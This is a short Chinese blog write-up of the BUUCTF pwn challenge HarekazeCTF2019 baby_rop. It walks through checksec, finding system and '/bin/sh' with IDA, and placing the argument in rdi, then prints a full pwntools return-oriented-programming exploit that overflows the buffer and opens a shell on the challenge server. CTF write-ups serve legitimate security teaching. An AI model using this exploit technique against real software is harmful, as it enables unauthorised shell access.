[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

先checksec一下,64位,开启NX保护
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
在IDA中看看,发现了system函数 和 "/bin/sh"字符串 ,找到地址
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

exploit

from pwn import *
p = remote("node3.buuoj.cn",26570)
binsh = 0x0601048
system_addr = 0x04005E3
pop_rdi = 0x0400683
payload = 'a' * (0x10 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
p.sendline(payload)
p.interactive()

不知道有没有人和我一样找不到flag, 哈哈哈哈.

上一篇:攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制


下一篇:栈溢出之ret2csu